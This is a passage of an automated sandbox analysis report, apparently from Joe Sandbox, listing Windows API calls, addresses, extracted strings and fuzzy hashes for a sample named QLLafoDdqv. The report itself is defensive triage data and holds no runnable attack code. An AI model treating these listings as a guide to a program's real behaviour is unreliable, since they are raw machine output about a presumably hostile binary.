              • API ID: Thread$CreateErrorLastResume__dosmaperr
              • String ID:
              • API String ID: 173952441-0
              APIs
              • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 006D604C
              • GetStockObject.GDI32(00000011), ref: 006D6060
              • SendMessageW.USER32(00000000,00000030,00000000), ref: 006D606A
              Similarity
              • API ID: CreateMessageObjectSendStockWindow
              • String ID:
              • API String ID: 3970641297-0
              APIs
              • ___BuildCatchObject.LIBVCRUNTIME ref: 006F3B56
                • Part of subcall function 006F3AA3: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 006F3AD2
                • Part of subcall function 006F3AA3: ___AdjustPointer.LIBCMT ref: 006F3AED
              • _UnwindNestedFrames.LIBCMT ref: 006F3B6B
              • __FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 006F3B7C
              • CallCatchBlock.LIBVCRUNTIME ref: 006F3BA4
              Similarity
              • API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
              • String ID:
              • API String ID: 737400349-0
              APIs
              • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,006D13C6,00000000,00000000,?,0070301A,006D13C6,00000000,00000000,00000000,?,0070328B,00000006,FlsSetValue), ref: 007030A5
              • GetLastError.KERNEL32(?,0070301A,006D13C6,00000000,00000000,00000000,?,0070328B,00000006,FlsSetValue,00772290,FlsSetValue,00000000,00000364,?,00702E46), ref: 007030B1
              • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0070301A,006D13C6,00000000,00000000,00000000,?,0070328B,00000006,FlsSetValue,00772290,FlsSetValue,00000000), ref: 007030BF
              Similarity
              • API ID: LibraryLoad$ErrorLast
              • String ID:
              • API String ID: 3177248105-0
              APIs
              • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000), ref: 0073747F
              • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 00737497
              • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 007374AC
              • RegisterTypeLibForUser.OLEAUT32(?,?,00000000), ref: 007374CA
              Similarity
              • API ID: Type$Register$FileLoadModuleNameUser
              • String ID:
              • API String ID: 1352324309-0
              APIs
              • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,0073ACD3,?,00008000), ref: 0073B0C4
              • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,0073ACD3,?,00008000), ref: 0073B0E9
              • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,0073ACD3,?,00008000), ref: 0073B0F3
              • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,0073ACD3,?,00008000), ref: 0073B126
              Similarity
              • API ID: CounterPerformanceQuerySleep
              • String ID:
              • API String ID: 2875609808-0
              APIs
              • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00732DC5
              • GetWindowThreadProcessId.USER32(?,00000000), ref: 00732DD6
              • GetCurrentThreadId.KERNEL32 ref: 00732DDD
              • AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00732DE4
              Similarity
              • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
              • String ID:
              • API String ID: 2710830443-0
              APIs
                • Part of subcall function 006E9639: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 006E9693
                • Part of subcall function 006E9639: SelectObject.GDI32(?,00000000), ref: 006E96A2
                • Part of subcall function 006E9639: BeginPath.GDI32(?), ref: 006E96B9
                • Part of subcall function 006E9639: SelectObject.GDI32(?,00000000), ref: 006E96E2
              • MoveToEx.GDI32(?,00000000,00000000,00000000), ref: 00768887
              • LineTo.GDI32(?,?,?), ref: 00768894
              • EndPath.GDI32(?), ref: 007688A4
              • StrokePath.GDI32(?), ref: 007688B2
              Similarity
              • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
              • String ID:
              • API String ID: 1539411459-0
              APIs
              • GetSysColor.USER32(00000008), ref: 006E98CC
              • SetTextColor.GDI32(?,?), ref: 006E98D6
              • SetBkMode.GDI32(?,00000001), ref: 006E98E9
              • GetStockObject.GDI32(00000005), ref: 006E98F1
              Similarity
              • API ID: Color$ModeObjectStockText
              • String ID:
              • API String ID: 4037423528-0
              APIs
              • GetCurrentThread.KERNEL32 ref: 00731634
              • OpenThreadToken.ADVAPI32(00000000,?,?,?,007311D9), ref: 0073163B
              • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,007311D9), ref: 00731648
              • OpenProcessToken.ADVAPI32(00000000,?,?,?,007311D9), ref: 0073164F
              Similarity
              • API ID: CurrentOpenProcessThreadToken
              • String ID:
              • API String ID: 3974789173-0
              • Opcode ID: e06761637a89cdd6dae6d644487237d8eedb1ed8b055ec0b8170b1c2b4863934
              • Instruction ID: b47e7c0917eca463b06563f46de632ec65e75d4311e549d7f9321fe0fb387975
              • Opcode Fuzzy Hash: e06761637a89cdd6dae6d644487237d8eedb1ed8b055ec0b8170b1c2b4863934
              • Instruction Fuzzy Hash: EEE08671601311EBE7201FE19E0DB663B7CAF44791F14C808F686D9080DABC4440C758
              APIs
              • GetDesktopWindow.USER32 ref: 0072D858
              • GetDC.USER32(00000000), ref: 0072D862
              • GetDeviceCaps.GDI32(00000000,0000000C), ref: 0072D882
              • ReleaseDC.USER32(?), ref: 0072D8A3
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: CapsDesktopDeviceReleaseWindow
              • String ID:
              • API String ID: 2889604237-0
              • Opcode ID: 46fd10555ce78d5e5ca6f0be6f1f1b253eb038102eda950e347686c8d331e0d1
              • Instruction ID: a1e015248ba213f0ff686f7f09f9ad729269b6c2fb46886580e93bc2a68491f4
              • Opcode Fuzzy Hash: 46fd10555ce78d5e5ca6f0be6f1f1b253eb038102eda950e347686c8d331e0d1
              • Instruction Fuzzy Hash: F3E01AB5800305DFCB429FA0D808A7DBBB2FB08310F14D009E88BE7250C7BC9941AF48
              APIs
              • GetDesktopWindow.USER32 ref: 0072D86C
              • GetDC.USER32(00000000), ref: 0072D876
              • GetDeviceCaps.GDI32(00000000,0000000C), ref: 0072D882
              • ReleaseDC.USER32(?), ref: 0072D8A3
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: CapsDesktopDeviceReleaseWindow
              • String ID:
              • API String ID: 2889604237-0
              • Opcode ID: 8c30af589b94cf18ec6c2596215f439f906e7d8749e10eccf5c2566d2759a9b5
              • Instruction ID: b9fbc5aad1b9bdf5ef9f001c47bd890f516d206e9e9ccb70df9fd0237e653fe8
              • Opcode Fuzzy Hash: 8c30af589b94cf18ec6c2596215f439f906e7d8749e10eccf5c2566d2759a9b5
              • Instruction Fuzzy Hash: 02E01A70C00304DFCB429FA0D80866DBBB2FB08310B149009E98AE7250C7BC59019F48
              APIs
                • Part of subcall function 006D7620: _wcslen.LIBCMT ref: 006D7625
              • WNetUseConnectionW.MPR(00000000,?,0000002A,00000000,?,?,0000002A,?), ref: 00744ED4
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: Connection_wcslen
              • String ID: *$LPT
              • API String ID: 1725874428-3443410124
              • Opcode ID: a0259067a6e9edf8d1c7586cb12e727afa582bb906799311179c97b3c833ea3e
              • Instruction ID: ee6ea3af779c17143d1bd9e330c6f207bb9ee584a19bd1a47bffd699da79edb8
              • Opcode Fuzzy Hash: a0259067a6e9edf8d1c7586cb12e727afa582bb906799311179c97b3c833ea3e
              • Instruction Fuzzy Hash: 94914D75A002549FDB14DF58C484FAABBF1BF44304F198099E80A9F3A2D739EE85DB91
              APIs
              • CharUpperBuffW.USER32(0072569E,00000000,?,0076CC08,?,00000000,00000000), ref: 007578DD
                • Part of subcall function 006D6B57: _wcslen.LIBCMT ref: 006D6B6A
              • CharUpperBuffW.USER32(0072569E,00000000,?,0076CC08,00000000,?,00000000,00000000), ref: 0075783B
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: BuffCharUpper$_wcslen
              • String ID: <sy
              • API String ID: 3544283678-4294649419
              • Opcode ID: c9159a4a275e924a04b3c4ddedb15c8861f3dea3807f2b8097501a6d778d6422
              • Instruction ID: 9ffc1710135f06a075a9cf6980cd7a11bb6445158324f7e8b8c3132c5d0309ba
              • Opcode Fuzzy Hash: c9159a4a275e924a04b3c4ddedb15c8861f3dea3807f2b8097501a6d778d6422
              • Instruction Fuzzy Hash: BB618371D141189BCF48EBE0DC91DFDB375BF14301B44452AF942A7291EF786A09DBA4
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID:
              • String ID: #
              • API String ID: 0-1885708031
              • Opcode ID: 2bf76d0a4c130946404615e64769b2adbd71c5f3d5016cdee181a9b2b8cb4ac5
              • Instruction ID: 5e8112ec98d61a462b2bdbb46215fc54cda045109d30ecbbd29a8a1ef2388a89
              • Opcode Fuzzy Hash: 2bf76d0a4c130946404615e64769b2adbd71c5f3d5016cdee181a9b2b8cb4ac5
              • Instruction Fuzzy Hash: 45514335A01396DFDB15DF69D0816FA7BAAEF15310F248059E8919B3C0DB399E43CBA0
              APIs
              • Sleep.KERNEL32(00000000), ref: 006EF2A2
              • GlobalMemoryStatusEx.KERNEL32(?), ref: 006EF2BB
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: GlobalMemorySleepStatus
              • String ID: @
              • API String ID: 2783356886-2766056989
              • Opcode ID: 9aa994e7cfe10a609439a920ce03e55d6472ace42a2e266f89344b50ffbaf49d
              • Instruction ID: 195248a5a8836f5fa29b98a90af3299b0432ef810a9389e6e1e61dd40b97c019
              • Opcode Fuzzy Hash: 9aa994e7cfe10a609439a920ce03e55d6472ace42a2e266f89344b50ffbaf49d
              • Instruction Fuzzy Hash: 0B5158718087499BD360AF10DC86BABBBF9FF84310F91884DF1D981195EB709529CB6B
              APIs
              • CharUpperBuffW.USER32(?,?,?,00000003,?,?), ref: 007557E0
              • _wcslen.LIBCMT ref: 007557EC
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: BuffCharUpper_wcslen
              • String ID: CALLARGARRAY
              • API String ID: 157775604-1150593374
              • Opcode ID: 2837c5cb3da8bed441e28c5cd2debedea87dc2016890a234462c0b7e272c4e66
              • Instruction ID: fa7da8ce989b906a3eff5fcb515edae7df93156e5fd6fbbf7140e495702f836f
              • Opcode Fuzzy Hash: 2837c5cb3da8bed441e28c5cd2debedea87dc2016890a234462c0b7e272c4e66
              • Instruction Fuzzy Hash: D6419F31E00209DFCB14DFA9C8959FEBBB5EF59311F10402DE905A7251E7B9AD85CBA0
              APIs
              • _wcslen.LIBCMT ref: 0074D130
              • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 0074D13A
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: CrackInternet_wcslen
              • String ID: |
              • API String ID: 596671847-2343686810
              • Opcode ID: a465e94310c23077c28105d607f8b93dd37bac1d089417086656fe9248bd2cf8
              • Instruction ID: e59fd2e0ac6a2cf8cec74010fba208d9631ebaecb1b8c1c259c371b053f00249
              • Opcode Fuzzy Hash: a465e94310c23077c28105d607f8b93dd37bac1d089417086656fe9248bd2cf8
              • Instruction Fuzzy Hash: 4A313D75D00209ABCF55EFA4CC85AEE7FBAFF04304F00001EF915A6265EB35AA06DB64
              APIs
              • DestroyWindow.USER32(?,?,?,?), ref: 00763621
              • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 0076365C
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: Window$DestroyMove
              • String ID: static
              • API String ID: 2139405536-2160076837
              • Opcode ID: c8e6cfa3169c1c75736e33e52170659dcf13f0283030f38f5132c7439da916ff
              • Instruction ID: 0b018369fd3b9a489186bb0b1438f142749cebde83e9bbb639f7de2853470b09
              • Opcode Fuzzy Hash: c8e6cfa3169c1c75736e33e52170659dcf13f0283030f38f5132c7439da916ff
              • Instruction Fuzzy Hash: D6318F71100204AAEB109F78DC40EFB73A9FF88724F00961DFDA697290DA78AD91C764
              APIs
              • SendMessageW.USER32(?,00001132,00000000,?), ref: 0076461F
              • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00764634
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: MessageSend
              • String ID: '
              • API String ID: 3850602802-1997036262
              • Opcode ID: ab699a260db84c5bb369bb4190484bc0103a0ae4a289b47af5b896dcc71c7fd0
              • Instruction ID: 72c942bbd99c6debff109d02880331025b851ce6089effceb8528f1a1fad5da1
              • Opcode Fuzzy Hash: ab699a260db84c5bb369bb4190484bc0103a0ae4a289b47af5b896dcc71c7fd0
              • Instruction Fuzzy Hash: 38312774A0120A9FDF14CFA9C980BDA7BB5FF49300F14406AED06AB342D774A951CF90
              APIs
              • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 0076327C
              • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00763287
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: MessageSend
              • String ID: Combobox
              • API String ID: 3850602802-2096851135
              • Opcode ID: 7af11ecf8bb60870da8cc17cd972c3026f2ddf3e5915b2f50e469d35d4754fc3
              • Instruction ID: 997092defedd7166d6c326abea698cf3df1a7257746bfd621fad275c15de15f4
              • Opcode Fuzzy Hash: 7af11ecf8bb60870da8cc17cd972c3026f2ddf3e5915b2f50e469d35d4754fc3
              • Instruction Fuzzy Hash: 6D11E271300208BFFF25DE54DC90EBB37AAFB943A4F104128F91A97290D6799D51C760
              APIs
                • Part of subcall function 006D600E: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 006D604C
                • Part of subcall function 006D600E: GetStockObject.GDI32(00000011), ref: 006D6060
                • Part of subcall function 006D600E: SendMessageW.USER32(00000000,00000030,00000000), ref: 006D606A
              • GetWindowRect.USER32(00000000,?), ref: 0076377A
              • GetSysColor.USER32(00000012), ref: 00763794
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: Window$ColorCreateMessageObjectRectSendStock
              • String ID: static
              • API String ID: 1983116058-2160076837
              • Opcode ID: 03b58c3129f5cc7066945cc0bc8f5d78177e02a807bc320969db50b7de55f22b
              • Instruction ID: 2c7ec7d799701aa0b904c0064bc4e49e8059ed111dbd1e3e19ce8f9e2161f1b1
              • Opcode Fuzzy Hash: 03b58c3129f5cc7066945cc0bc8f5d78177e02a807bc320969db50b7de55f22b
              • Instruction Fuzzy Hash: 301129B2610209AFDB01DFA8CC45AFA7BB8EB09354F004515FD56E2250D779E851DB50
              APIs
              • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 0074CD7D
              • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 0074CDA6
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: Internet$OpenOption
              • String ID: <local>
              • API String ID: 942729171-4266983199
              • Opcode ID: 34323b5b75b6ce3f73b590345d31a23327883da23e3e426dc5bc9ab067ad6a41
              • Instruction ID: dbab2b53fac9e62d10b9ed610a221f4dba34d8bb70a7981863a5ebe6da7a048e
              • Opcode Fuzzy Hash: 34323b5b75b6ce3f73b590345d31a23327883da23e3e426dc5bc9ab067ad6a41
              • Instruction Fuzzy Hash: 4A11C671B066357AD77A4B668C45EF7BE6CEF127A4F004226B15983190D7789840DAF0
              APIs
              • GetWindowTextLengthW.USER32(00000000), ref: 007634AB
              • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 007634BA
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: LengthMessageSendTextWindow
              • String ID: edit
              • API String ID: 2978978980-2167791130
              • Opcode ID: 559d64c93edb163c6a708ed535b0a48eb677e41e237ca7eb311fac5ad25c8fe7
              • Instruction ID: 9fb7c6079535bb392dd25087fbc61fb171528b6c80150ee07aec7863c1f1da1e
              • Opcode Fuzzy Hash: 559d64c93edb163c6a708ed535b0a48eb677e41e237ca7eb311fac5ad25c8fe7
              • Instruction Fuzzy Hash: 67118F71500248ABEB128E64DC44ABB7B6AEF05374F504324FD62931E0CB79DC55D754
              APIs
                • Part of subcall function 006D9CB3: _wcslen.LIBCMT ref: 006D9CBD
              • CharUpperBuffW.USER32(?,?,?), ref: 00736CB6
              • _wcslen.LIBCMT ref: 00736CC2
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: _wcslen$BuffCharUpper
              • String ID: STOP
              • API String ID: 1256254125-2411985666
              • Opcode ID: 3534ddd493c9639bf4845917164db8fc284de755b1b78ada218143f0c87bbd91
              • Instruction ID: 88536fb71b3386e1935d9d56455dea9e4b6f74483a1bd23c55d658a4f7139fb9
              • Opcode Fuzzy Hash: 3534ddd493c9639bf4845917164db8fc284de755b1b78ada218143f0c87bbd91
              • Instruction Fuzzy Hash: 85010432B10526AADB21AFBDDC808BF77B5EA61714B004529E85296292EA39E800C760
              APIs
                • Part of subcall function 006D9CB3: _wcslen.LIBCMT ref: 006D9CBD
                • Part of subcall function 00733CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00733CCA
              • SendMessageW.USER32(?,00000180,00000000,?), ref: 00731C46
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: ClassMessageNameSend_wcslen
              • String ID: ComboBox$ListBox
              • API String ID: 624084870-1403004172
              • Opcode ID: 62033c9b61dabb5e675a745da89209886e9d980bb17c98cd766979a6c4651087
              • Instruction ID: ce2ed5b33887f172cb3ee2702713faf09f5a97b6cbc0ff6224d0102d0443231d
              • Opcode Fuzzy Hash: 62033c9b61dabb5e675a745da89209886e9d980bb17c98cd766979a6c4651087
              • Instruction Fuzzy Hash: 0901F7B1B8010466DF18EBA0D951DFF73A89B11340F50141AB416632C2EA289E0887B5
              APIs
              • __Init_thread_footer.LIBCMT ref: 006EA529
                • Part of subcall function 006D9CB3: _wcslen.LIBCMT ref: 006D9CBD
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmp
